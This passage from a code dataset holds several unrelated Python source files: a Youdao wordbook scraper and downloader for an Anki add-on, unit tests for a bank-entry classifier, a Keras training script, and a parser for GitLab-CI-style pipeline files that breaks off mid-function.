[('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0')]\n urllib2.install_opener(opener)\n\n authentication_url = 'https://logindict.youdao.com/login/acc/login'\n payload = {\n 'app':'web',\n 'tp':'urstoken',\n 'cf':'7',\n 'fr':'1',\n 'ru':'http://dict.youdao.com/wordbook/wordlist?keyfrom=login_from_dict2.index',\n 'product':'DICT',\n 'type':'1',\n 'um':'true',\n 'username':username,\n 'password':hashlib.md5(password.encode('utf-8')).hexdigest(),\n 'savelogin':rememberme and 1 or 0,\n }\n req = urllib2.Request(authentication_url, urllib.urlencode(payload))\n urllib2.urlopen(req)\n if username in str(cj):\n self.__saveCookies(cj)\n return True\n else:\n return False\n\n def __saveCookies(self, cookiejar):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n for c in cookiejar:\n args = dict(vars(c).items())\n args['rest'] = args['_rest']\n del args['_rest']\n c = cookielib.Cookie(**args)\n MozillaCookieJar.set_cookie(c)\n MozillaCookieJar.save('Youdao.cookie', ignore_discard=True)\n\n def __loadCookies(self):\n if os.path.exists('Youdao.cookie'):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n MozillaCookieJar.load('Youdao.cookie', ignore_discard=True)\n return MozillaCookieJar\n else:\n return False\n\n def run(self):\n def totalPage():\n # page index start from 0 end at max-1\n req = urllib2.Request('http://dict.youdao.com/wordbook/wordlist?p=0&tags=')\n cookie = self.__loadCookies()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\n urllib2.install_opener(opener)\n response = urllib2.urlopen(req)\n source = response.read()\n try:\n return int(re.search('最后一页', source, re.M | re.I).group(1)) - 1\n except Exception:\n return 1\n\n def everyPage(pageIndex):\n req = urllib2.Request(\"http://dict.youdao.com/wordbook/wordlist?p=\" + str(pageIndex) + \"&tags=\")\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.__loadCookies()))\n urllib2.install_opener(opener)\n response = urllib2.urlopen(req)\n return response.read().decode('utf-8')\n\n parser = parseYoudaoWordbook()\n tp = totalPage()\n f=open(\"guru99.txt\", \"a+\")\n f.write(\"totalPage is %s \\r\\n\" % tp)\n f.close()\n for current in range(tp):\n parser.feed(everyPage(current))\n self.emit(QtCore.SIGNAL('updateProgressBar_dict(int,int)'),int(current+1), int(tp))\n\n self.results = parser.terms\n self.descresults = parser.descterms\n\n# Youdao Only\nclass parseYoudaoWordbook(HTMLParser):\n\n def __init__(self):\n HTMLParser.__init__(self)\n self.terms = []\n self.descterms = []\n\n def handle_starttag(self, tag, attrs):\n # retrive the terms\n \n if tag == 'div':\n for attribute, value in attrs:\n if attribute == 'class' and value == 'word':\n self.terms.append(attrs[1][1])\n if attribute == 'class' and value == 'desc':\n self.descterms.append(attrs[1][1])\t\t\t\t\n\n\nclass imageDownloader(QtCore.QThread):\n \"\"\"thread that download images of terms\"\"\"\n def __init__(self,imageUrls):\n QtCore.QThread.__init__(self)\n self.imageUrls = imageUrls\n\n def run(self):\n ti = len(self.imageUrls)\n for current in range(ti):\n urllib.urlretrieve(self.imageUrls[current][1], \"MG-\" + self.imageUrls[current][0] + '.jpg')\n self.emit(QtCore.SIGNAL('update'),current+1,ti)\n self.emit(QtCore.SIGNAL('updateProgressBar_img(int,int)'),int(current+1),int(ti))\n self.emit(QtCore.SIGNAL('seek_img(QString)'),str('Getting image: ' + self.imageUrls[current][0]))\n\nclass pronunciationDownloader(QtCore.QThread):\n def __init__(self,terms,ptype):\n QtCore.QThread.__init__(self)\n self.terms = terms\n self.ptype = ptype\n # 1 UK 2 US\n self.soundAPI = \"http://dict.youdao.com/dictvoice?audio={}&type={}\"\n\n def run(self):\n tp = len(self.terms)\n for current in range(tp):\n urllib.urlretrieve(self.soundAPI.format(self.terms[current],str(self.ptype)), \"MG-\" + self.terms[current] + '.mp3')\n self.emit(QtCore.SIGNAL('updateProgressBar_pron(int,int)'),int(current+1),int(tp))\n self.emit(QtCore.SIGNAL('seek_pron(QString)'),str('Getting pronunciation: ' + self.terms[current]))\n\nclass Lookupper(QtCore.QThread):\n def __init__(self, wordList,wordDescList):\n QtCore.QThread.__init__(self)\n self.wordList = wordList\n self.wordDescList = wordDescList\n self.lookUpedTerms = []\n def run(self):\n if self.wordList:\n tw = len(self.wordList)\n for current in range(tw):\n query = urllib.urlencode({\"q\": self.wordList[current]})\n f = urllib2.urlopen(\"https://dict.youdao.com/jsonapi?{}&dicts=%7b%22count%22%3a+99%2c%22dicts%22%3a+%5b%5b%22ec%22%2c%22phrs%22%2c%22pic_dict%22%5d%2c%5b%22web_trans%22%5d%2c%5b%22fanyi%22%5d%2c%5b%22blng_sents_part%22%5d%5d%7d\".format(query))\n r = f.read().decode('utf-8')\n try:\n json_result = json.loads(r)\n except:\n pass\n\n try:\n explains = self.wordDescList[current]\n except:\n try:\n explains = json_result[\"web_trans\"][\"web-translation\"][0][\"trans\"][0][\"value\"]\n except:\n try:\n explains = json_result[\"fanyi\"][\"tran\"]\n except:\n explains = None\n\n try:\n uk_phonetic = json_result[\"ec\"][\"word\"][0][\"ukphone\"]\n except:\n try:\n uk_phonetic = json_result[\"simple\"][\"word\"][0][\"ukphone\"]\n except:\n try:\n uk_phonetic = json_result[\"ec\"][\"word\"][0][\"phone\"]\n except:\n uk_phonetic = None\n\n try:\n us_phonetic = json_result[\"ec\"][\"word\"][0][\"usphone\"]\n except:\n try:\n us_phonetic = json_result[\"simple\"][\"word\"][0][\"usphone\"]\n except:\n try:\n us_phonetic = json_result[\"ec\"][\"word\"][0][\"phone\"]\n except:\n us_phonetic = None\n\n try:\n phrases = []\n phrase_explains = []\n json_phrases = json_result[\"phrs\"][\"phrs\"]\n for value in json_phrases:\n phrases.append(value[\"phr\"][\"headword\"][\"l\"][\"i\"])\n phrase_explains.append(value[\"phr\"][\"trs\"][0][\"tr\"][\"l\"][\"i\"])\n except:\n phrases = None\n phrase_explains = None\n\n try:\n sentences = []\n sentences_explains = []\n json_sentences = json_result[\"blng_sents_part\"][\"sentence-pair\"]\n for value in json_sentences:\n sentences.append(value[\"sentence-eng\"])\n sentences_explains.append(value[\"sentence-translation\"])\n except:\n sentences = None\n sentences_explains = None\n\n try:\n img = json_result[\"pic_dict\"][\"pic\"][0][\"image\"] + \"&w=150\"\n except:\n img = None\n\n lookUpedTerm = {\n \"term\": self.wordList[current],\n \"uk\": uk_phonetic,\n \"us\": us_phonetic,\n \"definition\": explains,\n \"phrases\": phrases and phrases[:3] or None,\n \"phrases_explains\": phrase_explains and phrase_explains[:3] or None,\n \"sentences\": sentences and sentences[:3] or None,\n \"sentences_explains\": sentences_explains and sentences_explains[:3] or None,\n \"image\": img\n }\n self.lookUpedTerms.append(lookUpedTerm)\n self.emit(QtCore.SIGNAL('updateProgressBar_lookup(int,int)'),int(current+1),int(tw))\n self.emit(QtCore.SIGNAL('seek_lookup(QString)'),str('Looking up: ' + self.wordList[current]))\n else:\n self.emit(QtCore.SIGNAL('seek_lookup(QString)'),str('No word has been lookupped'))\n\n# test = Youdao()\n# test.run()\n# print test.results\n","sub_path":"python2/addons/Dict2Anki/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651329589","text":"# Pablo Abad 2017-2018\n#\n# Toshl database program\n\nimport unittest\nimport datetime\nfrom toshl.SmartClassifer import ClassificationGroup, SmartClassifier, longest_common_substring\nfrom toshl.BankEntry import BankEntry\n\n\ndef _entry(account, ammount = -1):\n date = datetime.date(2017, 5, 13)\n return BankEntry(date, date, account, \"\", \"\", ammount)\n\n\nclass LCSTest(unittest.TestCase):\n def setUp(self):\n self.longMessage = True\n\n def test_lcs(self):\n self.assertEqual(\"\", longest_common_substring(\"\", \"\"))\n self.assertEqual(\"\", longest_common_substring(\"a\", \"\"))\n self.assertEqual(\"\", longest_common_substring(\"\", \"b\"))\n self.assertEqual(\"\", longest_common_substring(\"a\", \"b\"))\n self.assertEqual(\"abcd\", longest_common_substring(\"abcde\", \"tdsabcds\"))\n\n\nclass ClassificationGroupTest(unittest.TestCase):\n def setUp(self):\n self.unit = ClassificationGroup(minimumHintLength=3)\n self.longMessage = True\n\n def test_empty(self):\n self.assertEqual((None, None), self.unit.classify(_entry('abcde')), 'TestBasic: Classifier failed')\n\n def test_basic(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde')), 'TestBasic: Classifier failed')\n\n def test_negative(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.assertEqual((None, None), self.unit.classify(_entry('abcd')), 'TestBasic: Classifier failed')\n\n def test_longest_match(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.unit.update(_entry('abcdefg'), 'c1', 't2')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde')), 'TestBasic: Classifier abcde')\n self.assertEqual(('c1', 't2'), self.unit.classify(_entry('abcdefg')), 'TestBasic: Classify abcdefg')\n\n def test_sub_match(self):\n self.unit.update(_entry('abcde'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('ooooabcdefgoooo')), 'TestBasic: Classifier failed')\n\n def test_hint_minimise(self):\n self.unit.update(_entry('abcff'), 'c1', 't1')\n self.assertEqual((None, None), self.unit.classify(_entry('abc')), 'TestBasic: Classifier failed before minimize')\n self.unit.update(_entry('abckk'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abc')), 'TestBasic: Classifier failed after minimize')\n\n def test_no_add(self):\n self.unit.update(_entry('abcdd'), 'c1', 't1')\n self.unit.update(_entry('abcd'), 'c1', 't2')\n self.unit.update(_entry('abcff'), 'c1', 't1')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcdd')), 'TestBasic: abcdd failed')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abc')), 'TestBasic: abc failed')\n self.assertEqual(('c1', 't2'), self.unit.classify(_entry('abcd')), 'TestBasic: abcd failed')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcff')), 'TestBasic: abcff failed')\n\n\nclass SmartClassifierTest(unittest.TestCase):\n def setUp(self):\n self.unit = SmartClassifier()\n self.longMessage = True\n\n def test_smart_classifier(self):\n self.unit.update(_entry('abcde', -1), 'c1', 't1')\n self.unit.update(_entry('abcde', 1), 'i1', 't2')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde', -2)), 'TestBasic: expense failed')\n self.assertEqual(('c1', 't1'), self.unit.classify(_entry('abcde', 0)), 'TestBasic: expense 0 failed')\n self.assertEqual(('i1', 't2'), self.unit.classify(_entry('abcde', 3)), 'TestBasic: income failed')\n\n def test_storage(self):\n self.unit.update(_entry('abcde', -1), 'c1', 't1')\n self.unit.update(_entry('djsk', -1), 'c2', 't1')\n self.unit.update(_entry('dyuis', -1), 'c3', 't4')\n self.unit.update(_entry('abcde', 1), 'i1', 't2')\n self.unit.save('test.cls')\n another = SmartClassifier('test.cls')\n originalData = (self.unit.expenses.getData(), self.unit.incomes.getData())\n storedData = (another.expenses.getData(), another.incomes.getData())\n self.assertEqual(originalData, storedData)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_SmartClassifier.py","file_name":"test_SmartClassifier.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509229429","text":"from __future__ import absolute_import, division, print_function\r\n\r\n# tensorflow and keras library to create a model \r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\n\r\n#sklearn library for spliting the data into train and test data\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport numpy as np\r\n\r\n\r\n# naming the files\r\nDATA_FILE = \"dataset10_5000.csv\"\r\nMODEL_FILE = \"model_10_5000_lr_dropout.h5\"\r\n#Loading the data\r\ndataset = np.loadtxt(DATA_FILE, delimiter=\",\")\r\n\r\n#split the input as X and output as Y\r\nX = dataset[:, 0:10] \r\nY = dataset[:, 10] \r\n\r\n#print(X)\r\n#print(Y)\r\n\r\n#spliting the data into test and train data\r\nx_train, x_test, y_train, y_test = train_test_split(X,Y, test_size=0.25)\r\n\r\n# we using sequential model \r\nmodel = keras.Sequential()\r\n#adding layers \r\nmodel.add(keras.layers.Dense(64, input_dim=10 , activation=tf.nn.relu))\r\nmodel.add(keras.layers.Dropout(0.5))\r\nmodel.add(keras.layers.Dense(9, activation=tf.nn.relu))\r\nmodel.add(keras.layers.Dense(3, activation=tf.nn.softmax))\r\n\r\n\r\n#complie the model with optimizers\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n#fitting the model and allocated as history for visualisation\b\r\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,\r\n patience=5, min_lr=0.001)\r\nhistory = model.fit(x_train, y_train, epochs=1000, batch_size=150, validation_data=(x_test, y_test) , callbacks = [reduce_lr])\r\n\r\n#print summary when model finished training\r\nmodel.summary()\r\nscores = model.evaluate(X,Y)\r\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\r\n\r\n#output the model\r\nmodel.save(MODEL_FILE)\r\n\r\n#import the package for visualisation\r\nfrom keras.utils import plot_model\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# plot layers\r\nplot_model(model, show_shapes=True , to_file='model.png')\r\n\r\n# Plot training & validation accuracy values\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.title('Model accuracy')\r\nplt.ylabel('Accuracy')\r\nplt.xlabel('Epoch')\r\nplt.legend(['Train', 'Test'], loc='upper left')\r\nplt.show()\r\nplt.savefig('acc.png')\r\n\r\n#Plot training & validation loss values\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('Model loss')\r\nplt.ylabel('Loss')\r\nplt.xlabel('Epoch')\r\nplt.legend(['Train', 'Test'], loc='upper left')\r\nplt.show()\r\nplt.savefig('loss.png')\r\n\r\n\r\n","sub_path":"data_training.py","file_name":"data_training.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"196478779","text":"#!/usr/bin/python3\n#########################################################\n#\n# > Parser / Evaluator for CI files\n# > in GitLab CI file like syntax\n#\n# vim: sw=4 ts=4 noexpandtab:\n\nimport os, sys, threading\nimport yaml, re\nfrom copy import deepcopy\n\n#########################################################\n## List of keys\n# See for comparision and more info: https://docs.gitlab.com/ce/ci/yaml/README.html\n#\nPIPELINEKEY_SERVICES = \"services\" # Will probably never get supported\nPIPELINEKEY_IMAGE = \"image\" # Docker / Image manager info\nPIPELINEKEY_VARIABLES = \"variables\" # Job global env variables\nPIPELINEKEY_STAGES = \"stages\" # job order\nPIPELINEKEY_BEFORE_SCRIPT = \"before_script\" # Script to run before all jobs\nPIPELINEKEY_AFTER_SCRIPT = \"after_script\" # Script to run after all jobs\n\nJOBKEY_VARIABLES = PIPELINEKEY_VARIABLES # Exported env vars\nJOBKEY_ONLY = \"only\" # Only start job if matched\nJOBKEY_TAGS = \"tags\" # Only start job on client with given tag\nJOBKEY_STAGE = \"stage\" # The stage (build,text,..)\nJOBKEY_SCRIPT = \"script\" # List of actions to execute\nJOBKEY_ARTIFACTS = \"artifacts\" # List of things to place in job artifact archive\nJOBKEY_DEPENDENCIES = \"dependencies\" # Restores artifacts from given jobs\nJOBKEY_ARTIFACTS_NAME = \"name\"\nJOBKEY_ARTIFACTS_PATHS = \"paths\"\nJOBKEY_ARTIFACTS_EXPIRE_IN = \"expire_in\"\nJOBKEY_ONLY_VARIABLES = \"variables\"\nJOBKEY_ONLY_REFS = \"refs\"\n\nMATRIXKEY_STAGES = PIPELINEKEY_STAGES # available stages\nMATRIXKEY_IMAGE = PIPELINEKEY_IMAGE # image to load for this pipeline\nMATRIXKEY_JOBS = \"jobs\" # collection of jobs, grouped by index of stage\n\n# Reserved keys - list of disallowed job names\nPIPELINES_KEYS = [PIPELINEKEY_STAGES, PIPELINEKEY_IMAGE, PIPELINEKEY_BEFORE_SCRIPT, PIPELINEKEY_AFTER_SCRIPT, PIPELINEKEY_VARIABLES, PIPELINEKEY_SERVICES]\nJOB_KEYS = [JOBKEY_DEPENDENCIES,JOBKEY_SCRIPT,JOBKEY_STAGE,JOBKEY_VARIABLES,JOBKEY_ARTIFACTS]\n\n\nclass IdGenerator(object):\n \"\"\"\n A class which provides an ID for jobs & pipelines.\n Supposed to be passed as per-project preserved object.\n \"\"\"\n\n def __init__(self, last_job_id=0, last_pipeline_id=0):\n self._last_job_id = last_job_id\n self._last_pipeline_id = last_pipeline_id\n self._lock = threading.Lock()\n\n def next_pipeline_id(self):\n with self._lock:\n self._last_pipeline_id += 1\n ret = self._last_pipeline_id\n return ret\n def next_job_id(self):\n with self._lock:\n self._last_job_id += 1\n ret = self._last_job_id\n return ret\n def current_ids(self):\n return {\"job\": self._last_job_id, \"pipeline\": self._last_pipeline_id}\n\n\nclass CiFile:\n \"\"\"\n 1) Init this with a per-project preservered id_generator with initial values (e.g. from DB)\n Optionally pass variables (from e.g. API) in the variables dict parameter\n 2) Use `read_cifile` to read a cifile from YAML or pass a otherwise read dict\n This will apply many fixes, refactorings and other actions to make it ready for use\n 3) Use `prepare_run_with` when you have repository details available and you are about to start building\n There are some important required arguments which are needed to filter jobs not allowed to run (by e.g. variable condition)\n 4) Use `convert_to_matrix` to get a copy of the values in a |pipeline -> stages -> jobs| hierachy\n This allows to easy process the jobs in correct order\n 5) Processing order inside a stage does not matter, can be random\n All jobs in one stage must have run and all must be successful for the next stage to start\n When all jobs in last stage are completed successfully, the pipeline is successfully\n \"\"\"\n\n def __init__(self,\n id_generator=IdGenerator(),\n default_stage=\"test\",\n default_image=\"local_system_shell\",\n default_artifact_expire_in=\"3 days\",\n default_artifact_name=\"${CI_JOB_NAME}_${CI_COMMIT_REF_NAME}_${CI_JOB_ID}\",\n variables=None):\n \"\"\"\n Provide a project-wide id generator, initialized with the last ID used.\n \"\"\"\n\n self._cidict = {}\n self._default_stage = default_stage\n self._default_image = default_image\n self._default_artifact_name = default_artifact_name\n self._default_artifact_expire_in = default_artifact_expire_in\n self._forced_variables = variables or {}\n self._id_generator = id_generator\n\n def convert_to_matrix(self):\n \"\"\"\n Convert CI Dictionary to a matrix view. Note that this is a copy of an\n internal dict and changes don't affect the internal dict nor the matrix\n can be used as CiFile again.\n\n Matrix:\n - image\n - jobs: Dict of jobs grouped by stage, orded by order in `stages`\n - stages: Name and order of all stages\n \"\"\"\n\n pipeline = {\n MATRIXKEY_JOBS: [],\n MATRIXKEY_STAGES: self._cidict[PIPELINEKEY_STAGES],\n MATRIXKEY_IMAGE: self._cidict[PIPELINEKEY_IMAGE],\n }\n for stage in self._cidict[PIPELINEKEY_STAGES]:\n jobs = {}\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict) and job[JOBKEY_STAGE] == stage:\n jobs[jobname] = job\n pipeline[MATRIXKEY_JOBS].append(jobs)\n return pipeline\n\n @staticmethod\n def print_matrix(matrix):\n \"\"\"\n Print given matrix (from `convert_to_matrix`) to command line.\n \"\"\"\n\n for i, stage in enumerate(matrix[MATRIXKEY_STAGES]):\n print(\"\\nJobs for \" + stage + \" (\" + str(len(matrix[MATRIXKEY_JOBS][i])) +\"):\")\n for jobname, job in matrix[MATRIXKEY_JOBS][i].items():\n print(\"├──\" + str(jobname)) #+ \", \" + job[JOBKEY_VARIABLES][\"CI_JOB_ID\"])\n\n def _parse_cidict(self, cidict):\n \"\"\"\n Fill missing but deductable information into the *cidict* and store it\n in self.\n \"\"\"\n\n if not isinstance(cidict, dict):\n raise TypeError('expected dict, got {}'.format(type(cidict).__name__))\n\n self._cidict = cidict\n\n # Note: calls are order dependent.\n\n self._pipeline_various_tweaks()\n\n self._job_scan_apply_stages()\n self._job_convert_list_to_script()\n self._job_scan_apply_stages()\n\n self._job_convert_before_after_script()\n\n self._job_various_tweaks()\n self._job_script_always_list()\n self._job_combine_variables()\n self._job_streamline_only()\n self._job_streamline_artifacts()\n\n return self\n\n def prepare_run_with(self, ci_commit_ref_name, ci_pipeline_source, ci_commit_message, ci_commit_sha, ci_commit_tag=None):\n \"\"\"\n Based upon https://docs.gitlab.com/ce/ci/variables/#predefined-variables-environment-variables\n ci_commit_ref_name: Branch or tag name for which project is built\n ci_pipeline_source: Indicates how the pipeline was triggered. Options include push, web, trigger, schedule, api, pipeline\n ci_commit_message: Full commit message\n ci_commit_sha: Commit hash\n ci_commit_tag: The commit tag name. Present only when building tags.\n \"\"\"\n\n self._pipeline_add_buildinfo(ci_commit_ref_name, ci_pipeline_source, ci_commit_message, ci_commit_sha, ci_commit_tag)\n self._evaluate_jobs()\n self._assign_ids()\n\n def read_cifile(self, fyaml=None, dictionary=None):\n \"\"\"\n Read and parse CI file from yaml or otherwise loaded dictionary. Returns\n *self* for call chaining.\n \"\"\"\n\n if fyaml:\n with open(fyaml, 'r') as f:\n dictionary=yaml.load(f.read())\n if dictionary:\n self._parse_cidict(dictionary)\n return self\n\n def get_cidict(self):\n \"\"\"\n Get a copy of the internal cidict.\n \"\"\"\n\n return deepcopy(self._cidict)\n\n @staticmethod\n def extract_str_list(obj, noneval=[]):\n \"\"\"\n Try to get a list of strings from *obj*, allowing it to exist in various\n formats.\n \"\"\"\n\n if obj is None:\n return noneval\n if isinstance(obj, str):\n return [obj]\n if isinstance(obj, (int, bool, float)):\n return [str(obj)]\n elif isinstance(obj, list):\n return [str(o) for o in obj if isinstance(o, (str,int, bool, float))]\n return noneval\n\n @staticmethod\n def extract_str(obj, noneval=\"\"):\n \"\"\"\n Try to get a string from *obj*, taking various cases into account.\n \"\"\"\n\n if isinstance(obj, (str,int, bool, float)):\n return str(obj)\n elif isinstance(obj, list):\n strs = [ o for o in obj if isinstance(o,str) ]\n return strs[0] if strs else noneval\n return noneval\n\n @staticmethod\n def extract_str_dict(d):\n \"\"\"\n Apply #extract_str() to every value in the dictionary *d*.\n Returns a new dictionary that does not contain the values that could\n not be coerced to strings.\n \"\"\"\n\n ret = {}\n for var, value in (d if isinstance(d, dict) else {}).items():\n value = CiFile.extract_str(value, None)\n if value:\n ret[var] = value\n return ret\n\n def _pipeline_various_tweaks(self):\n \"\"\"\n Various smaller tweaks for the whole pipeline.\n \"\"\"\n\n # filter out templates (started with dot)\n self._cidict = {jobname:job for (jobname,job) in self._cidict.items() if isinstance(jobname,str) and not jobname.startswith(\".\") }\n\n # image (docker etc) - ensure one string\n tmp = self.extract_str(self._cidict[PIPELINEKEY_IMAGE] if PIPELINEKEY_IMAGE in self._cidict else self._default_image, self._default_image)\n self._cidict[PIPELINEKEY_IMAGE] = tmp if isinstance(tmp, str) else self._default_image\n\n def _job_scan_apply_stages(self):\n \"\"\"\n Scan for stages, assign default stages to jobs not having one.\n \"\"\"\n\n # Extract stages list - string only list without subitems\n stages = self._cidict.pop(PIPELINEKEY_STAGES) if PIPELINEKEY_STAGES in self._cidict else []\n\n # Scan for unspecified stages\n for job, v in self._cidict.items():\n if job not in PIPELINES_KEYS and isinstance(v, dict) and JOBKEY_STAGE in self._cidict[job]: # is job with stage\n stage = self.extract_str(self._cidict[job][JOBKEY_STAGE])\n if stage and not stage in stages:\n stages.append(stage)\n\n # Add default stage when nothing found\n stages=stages if stages else [self._default_stage]\n\n # Assign default stage for jobs with none or invalid\n for jobname, v in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(v, dict):\n stage=self.extract_str(self._cidict[jobname][JOBKEY_STAGE] if JOBKEY_STAGE in self._cidict[jobname] else stages[0], noneval=stages[0])\n self._cidict[jobname][JOBKEY_STAGE] = stage\n\n self._cidict[PIPELINEKEY_STAGES] = stages\n\n def _job_convert_before_after_script(self):\n \"\"\"\n Convert before_script, post_script to a normal job (so this works like\n any other job in matrix ;)\n \"\"\"\n\n for jobkey in [PIPELINEKEY_BEFORE_SCRIPT, PIPELINEKEY_AFTER_SCRIPT]:\n job = {JOBKEY_STAGE: jobkey, JOBKEY_SCRIPT: []}\n job[JOBKEY_SCRIPT] = self._cidict[jobkey] if jobkey in self._cidict else []\n if len(job[JOBKEY_SCRIPT]) > 0:\n del self._cidict[jobkey]\n self._cidict[jobkey.replace('_',':')] = job\n if jobkey == PIPELINEKEY_BEFORE_SCRIPT:\n self._cidict[PIPELINEKEY_STAGES].insert(0, PIPELINEKEY_BEFORE_SCRIPT)\n if jobkey == PIPELINEKEY_AFTER_SCRIPT:\n self._cidict[PIPELINEKEY_STAGES].append(PIPELINEKEY_AFTER_SCRIPT)\n\n def _job_convert_list_to_script(self):\n \"\"\"\n If a job only has a list, move that to script\n job:name: job:name:\n - make script:\n - make\n \"\"\"\n\n for jobname, v in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(v, list):\n script=self.extract_str_list(self._cidict[jobname], noneval=None)\n if script:\n self._cidict[jobname] = {JOBKEY_SCRIPT: script}\n\n def _job_script_always_list(self):\n \"\"\"\n Make sure a job script part is always a list and a job always has script\n job:name: job:name:\n script: make script:\n - make\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n if not JOBKEY_SCRIPT in job:\n job[JOBKEY_SCRIPT] = []\n script=self.extract_str_list(job[JOBKEY_SCRIPT], noneval=[])\n if script:\n self._cidict[jobname][JOBKEY_SCRIPT] = script\n\n def _job_streamline_artifacts(self):\n \"\"\"\n Make sure a job always specifies artifact info accordingly\n job:name:\n artifacts:\n name: \"name_of_archive_file\"\n expire_in: \"7 days\"\n paths:\n - dist\n - build/some.log\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n artifacts = {\n JOBKEY_ARTIFACTS_NAME: self._default_artifact_name,\n JOBKEY_ARTIFACTS_EXPIRE_IN: self._default_artifact_expire_in,\n JOBKEY_ARTIFACTS_PATHS: []\n }\n if JOBKEY_ARTIFACTS in job:\n if isinstance(job[JOBKEY_ARTIFACTS], list):\n artifacts[JOBKEY_ARTIFACTS_PATHS] = self.extract_str_list(job[JOBKEY_ARTIFACTS])\n if JOBKEY_ARTIFACTS_PATHS in job[JOBKEY_ARTIFACTS]:\n artifacts[JOBKEY_ARTIFACTS_PATHS] = self.extract_str_list(job[JOBKEY_ARTIFACTS][JOBKEY_ARTIFACTS_PATHS])\n artifacts[JOBKEY_ARTIFACTS_NAME] = job[JOBKEY_ARTIFACTS][JOBKEY_ARTIFACTS_NAME] if JOBKEY_ARTIFACTS_NAME in job[JOBKEY_ARTIFACTS] else self._default_artifact_name\n artifacts[JOBKEY_ARTIFACTS_EXPIRE_IN] = job[JOBKEY_ARTIFACTS][JOBKEY_ARTIFACTS_NAME] if JOBKEY_ARTIFACTS_EXPIRE_IN in job[JOBKEY_ARTIFACTS] else self._default_artifact_expire_in\n job[JOBKEY_ARTIFACTS] = artifacts\n\n def _job_streamline_only(self):\n \"\"\"\n Make sure a job only part is always only/refs and only/variables\n job:name:\n only:\n refs:\n - triggers\n variables:\n - $BUILD_COOL_FEATURE\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n if not JOBKEY_ONLY in job:\n job[JOBKEY_ONLY] = {}\n\n # Find values\n found = []\n tmp=self.extract_str_list(job[JOBKEY_ONLY], noneval=[])\n found.extend(tmp)\n if JOBKEY_ONLY_VARIABLES in job[JOBKEY_ONLY]:\n found.extend(self.extract_str_list(job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES], noneval=[]))\n if JOBKEY_ONLY_REFS in job[JOBKEY_ONLY]:\n found.extend(self.extract_str_list(job[JOBKEY_ONLY][JOBKEY_ONLY_REFS], noneval=[]))\n\n # Remove some parts\n while JOBKEY_ONLY_REFS in found: found.remove(JOBKEY_ONLY_REFS)\n while JOBKEY_ONLY_VARIABLES in found: found.remove(JOBKEY_ONLY_VARIABLES)\n job[JOBKEY_ONLY] = {\n JOBKEY_ONLY_REFS: [ v for v in found if not v.startswith(\"$\") ],\n JOBKEY_ONLY_VARIABLES: [ v for v in found if v.startswith(\"$\") ],\n }\n\n def _job_various_tweaks(self):\n \"\"\"\n Various small tweaks\n \"\"\"\n\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS:\n # job: Make sure \"tags\" is a list\n tmp = job[JOBKEY_TAGS] if JOBKEY_TAGS in job else []\n job[JOBKEY_TAGS] = self.extract_str_list(tmp, noneval=[])\n\n # job: Make sure \"dependencies\" is a list\n tmp = job[JOBKEY_DEPENDENCIES] if JOBKEY_DEPENDENCIES in job else []\n job[JOBKEY_DEPENDENCIES] = self.extract_str_list(tmp, noneval=[])\n\n def _job_combine_variables(self, injectdict={}):\n \"\"\"\n Distribute variables from pipelines, ci and injected variables and ensure\n all variables sections are (k,v):(str,str) only.\n \"\"\"\n\n # Extract and fix pipeline vars (lowest priority)\n pvars=self.extract_str_dict(self._cidict[PIPELINEKEY_VARIABLES] if PIPELINEKEY_VARIABLES in self._cidict else {})\n self._cidict[PIPELINEKEY_VARIABLES] = pvars\n\n # Distribute global variables to jobs and possible fix job vars\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n jvars=self.extract_str_dict(job[JOBKEY_VARIABLES] if JOBKEY_VARIABLES in job else {})\n\n # pipeline vars\n for pvar, gvalue in pvars.items():\n if not pvar in jvars:\n 